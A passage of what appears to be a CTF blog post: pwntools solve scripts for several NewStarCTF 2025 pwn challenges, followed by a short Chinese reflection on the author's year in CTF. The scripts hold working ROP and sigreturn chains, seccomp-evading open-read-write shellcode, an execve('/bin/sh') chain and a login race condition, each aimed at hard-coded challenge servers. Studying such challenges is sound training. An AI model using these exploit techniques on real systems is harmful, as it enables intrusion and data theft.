filename = "pwn"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "47.94.87.199"
port = 24869
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''
def start():
    """Select the target: P -> local process, R -> remote, else gdb with `gs`."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)
io = start()
pop_rdi_ret = 0x4013f3
pop_rsi_ret = 0x4013f5
pop_rdx_ret = 0x4013f7
ret = 0x40101a   # not used below
open_addr = elf.plt['open']
write_addr = elf.plt['write']
read_addr = elf.plt['read']
rw = 0x404800        # scratch buffer inside the binary's writable segment
flag = 0x40206a      # address of the flag path string in the binary
# open -> read -> write chain; fd 5 is the descriptor the author observed
# open() returning on this binary (not verified here).
payload = b'a'*0x28 + p64(pop_rdi_ret) + p64(flag) + p64(pop_rsi_ret) + p64(0) + p64(open_addr) +\
    p64(pop_rdi_ret) + p64(5) + p64(pop_rsi_ret) + p64(rw) + p64(pop_rdx_ret) + p64(0x100) + p64(read_addr) +\
    p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_ret) + p64(rw) + p64(pop_rdx_ret) + p64(0x100) + p64(write_addr)
io.recvuntil(b'something?')
io.sendline(b'n')
io.recvuntil(b'flag?')
io.sendline(b'2')
io.recvuntil(b'choice:')
io.sendline(b'2')
io.recvuntil(b'choice:')
io.sendline(b'1')
io.recvuntil(b'something')
io.send(payload.ljust(0x100, b'\x00'))
io.interactive()
# 0x1f only_read -- the author's solve script (newstarctf2025).
# Addresses are specific to the distributed `pwn_patched` binary and the
# 2.35-0ubuntu3.11 libc; the paths are the author's local cpwn cache.
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6_2.35-0ubuntu3.11_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "8.147.132.32"
port = 25201
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b vuln
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6-dbg_2.35-0ubuntu3.11_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/glibc-source_2.35-0ubuntu3.11_all/usr/src/glibc/glibc-2.35
'''
def start():
    """Select the target: P -> local process, R -> remote, else gdb with `gs`."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)
io = start()
sigret = 0x401366
syscall_ret = 0x40136d
main = 0x401373      # not used below
rw = 0x404000        # writable segment used as a fake stack / scratch area
leave_ret = 0x401360
call_read = 0x401349
# First SigreturnFrame: rax=2 (SYS_open) with rdi pointing at the "./flag"
# string placed below, then resume at syscall_ret with rsp/rbp inside `rw`.
sigFrame = SigreturnFrame()
sigFrame.rax = 2
sigFrame.rdi = rw + 0x800 + 0x10
sigFrame.rsi = 0
sigFrame.rdx = 0
sigFrame.rip = syscall_ret
sigFrame.rsp = rw + 0x800 - 0x10
sigFrame.rbp = rw + 0x600
log.info("frame len --> " + hex(len(sigFrame)))
log.info("sigframe --> " + hexdump(sigFrame))
payload = b'a'*0x10 + p64(rw + 0x800) + p64(call_read)
io.send(payload.ljust(0x100, b'\x00'))
# The frame is sliced ([0x18:-0x8]) because its leading fields are supplied
# by the preceding qwords of the payload; every send is padded to 0x100.
payload = p64(call_read) + p64(sigret) + p64(rw + 0x800 - 0x10) + p64(leave_ret) + b'./flag\x00\x00' + bytes(sigFrame)[0x18:-0x8]
io.send(payload.ljust(0x100, b'\x00'))
# Second frame: rax=40 (SYS_sendfile) out_fd=1, in_fd=3, count=0x100.
sigFrame = SigreturnFrame()
sigFrame.rax = 40
sigFrame.rdi = 1
sigFrame.rsi = 3
sigFrame.rdx = 0
sigFrame.r10 = 0x100
sigFrame.rip = syscall_ret
log.info("frame len --> " + hex(len(sigFrame)))
log.info("sigframe --> " + hexdump(sigFrame))
payload = p64(rw) + p64(sigret) + p64(rw + 0x600 - 0x10) + p64(leave_ret) + bytes(sigFrame)[0x10:-0x8]
io.send(payload.ljust(0x100, b'\x00'))
io.interactive()
# 0x20 overflow -- the author's solve script (newstarctf2025).
# 0x401222 is the target address taken from the distributed binary.
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "8.147.132.32"
port = 39380
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''
def start():
    """Select the target: P -> local process, R -> remote, else gdb with `gs`."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)
io = start()
payload = b'a'*0x100 + p64(0xdeadbeef) + p64(0x401222)
io.sendline(payload)
io.interactive()
# 0x21 pwndoor -- the author's solve script (newstarctf2025).
# The whole solve is a single hard-coded answer the author recovered from
# the binary; the libc/gdb scaffolding is the author's template and unused.
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "8.147.132.32"
port = 42958
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''
def start():
    """Select the target: P -> local process, R -> remote, else gdb with `gs`."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)
io = start()
io.sendline(b'7038329')
io.interactive()
# 0x22 sandbox_plus -- the author's solve script (newstarctf2025).
# The binary asks for an "orw_plus function"; the author answers with
# hand-written openat / read / writev shellcode (no execve), which is what a
# seccomp open-read-write allow-list permits.
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6_2.35-0ubuntu3.11_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "39.106.48.123"
port = 22398
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
# Breakpoint is given as a PIE offset via pwndbg/gef's $rebase.
gs = '''
b *$rebase(0x139a)
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6-dbg_2.35-0ubuntu3.11_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/glibc-source_2.35-0ubuntu3.11_all/usr/src/glibc/glibc-2.35
'''
def start():
    """Select the target: P -> local process, R -> remote, else gdb with `gs`."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)
io = start()
# Syscall numbers used: 257 = openat (dirfd -100 = AT_FDCWD), 17 = pread64,
# 20 = writev. 0x67616c66 is "flag" in little-endian.
shellcode = asm('''
mov rdi, -100
push 0x0000000067616c66
mov rsi, rsp
xor rdx, rdx
xor r10, r10
push 257
pop rax
syscall
push rax
pop rdi
sub rsp, 0x100
push rsp
pop rsi
push 0x100
pop rdx
xor r10, r10
push 17
pop rax
syscall
push 1
pop rdi
mov rsi, rsp
push 0x100
push rsi
mov rsi, rsp
push 1
pop rdx
push 20
pop rax
syscall
nop
nop
nop
''')
io.recvuntil(b'please input a orw_plus function (also also after compile)')
io.send(shellcode)
io.interactive()
# 0x23 syscall -- the author's solve script (newstarctf2025), 32-bit target.
# Gadget addresses are specific to the distributed static `pwn` binary.
from pwn import *
context(os='linux', arch='i386', log_level='debug')
filename = "pwn"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/i386/libc6_2.35-0ubuntu3.10_i386/lib/i386-linux-gnu/libc.so.6"
host = "39.106.48.123"
port = 42840
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b func
'''
def start():
    """Select the target: P -> local process, R -> remote, else gdb with `gs`."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)
io = start()
pop_eax_ret = 0x080b438a
pop_ebx_ret = 0x08049022
pop_ecx_ret = 0x0804985a
pop_edx_ret = 0x0804985c
magic = 0x080507cf      # write-what-where gadget chosen by the author
syscall = 0x0806475d    # not used below
int_80 = 0x08049c0a
rw = 0x80ed000          # writable address where "/bin/sh" is assembled
# Two 4-byte writes build "/bin/sh\0" at rw-0x28, then execve (eax=0xb)
# is invoked through int 0x80 with ebx pointing at `rw`.
payload = b'a'*(0x12+4) + p32(pop_edx_ret) + p32(rw - 0x28) + p32(pop_ecx_ret) + b'/bin' + p32(magic) +\
    p32(pop_edx_ret) + p32(rw - 0x28 + 4) + p32(pop_ecx_ret) + b'/sh\x00' + p32(magic) +\
    p32(pop_eax_ret) + p32(0xb) + p32(pop_ebx_ret) + p32(rw) + p32(pop_ecx_ret) + p32(0) + p32(pop_edx_ret) + p32(0) + p32(int_80)
log.info("len --> " + hex(len(payload)))
io.recvuntil(b'guys')
io.send(payload.ljust(100, b'\x00'))
io.interactive()
# 0x24 小明的问题 -- the author's solve script (newstarctf2025).
# Three connections are opened to the same service and their menu
# interactions are interleaved; the libc/gdb scaffolding is the author's
# template and is not otherwise used here.
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6_2.35-0ubuntu3.11_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "39.106.48.123"
port = 38828
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6-dbg_2.35-0ubuntu3.11_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/glibc-source_2.35-0ubuntu3.11_all/usr/src/glibc/glibc-2.35
'''
def start():
    """Select the target: P -> local process, R -> remote, else gdb with `gs`."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)
io1 = start()
io2 = start()
io3 = start()
# Connection 1: register (option 1) then log in (option 2) as r3t2/123.
io1.recvuntil(b'Please select your operation:')
io1.sendline(b'1')
io1.recvuntil(b'username:')
io1.sendline(b'r3t2')
io1.recvuntil(b'password')
io1.sendline(b'123')
io1.recvuntil(b'Please select your operation:')
io1.sendline(b'2')
io1.recvuntil(b'username:')
io1.sendline(b'r3t2')
io1.recvuntil(b'password')
io1.sendline(b'123')
# Connection 2: log in with the same account.
io2.recvuntil(b'Please select your operation:')
io2.sendline(b'2')
io2.recvuntil(b'username:')
io2.sendline(b'r3t2')
io2.recvuntil(b'password')
io2.sendline(b'123')
io2.recvuntil(b'Please select your operation:')
# Both connections issue option 3 for the same account at nearly the same
# time; the prompts are answered in alternating order on purpose.
io1.recvuntil(b'Please select your operation:')
io1.sendline(b'3')
io2.sendline(b'3')
io1.recvuntil(b'username:')
io2.recvuntil(b'username:')
io2.sendline(b'r3t2')
io1.sendline(b'r3t2')
io1.recvuntil(b'password')
io2.recvuntil(b'password')
io1.sendline(b'123')
io2.sendline(b'123')
# Connection 3: register as `root` and hand the session to the operator.
io3.recvuntil(b'Please select your operation:')
io3.sendline(b'1')
io3.recvuntil(b'username:')
io3.sendline(b'root')
io3.recvuntil(b'password')
io3.sendline(b'123')
io3.interactive()
0xff
原来已经一年了,moectf也算是见证了笔者这一年的变化,看到平台还留存着自己的参赛记录。学校的新生赛也刚刚结束,25级的新师傅们很有天赋和潜力;回想起自己去年新生赛的时候什么都不会,却也坚持每天到线下,也算勤能补拙吧哈哈。本人笔拙,写不出富含情感的文字,许多感受也写不太出来。最后就祝WHUCTF/DAWN越来越好,祝看到最后的师傅们天天向上! 以上。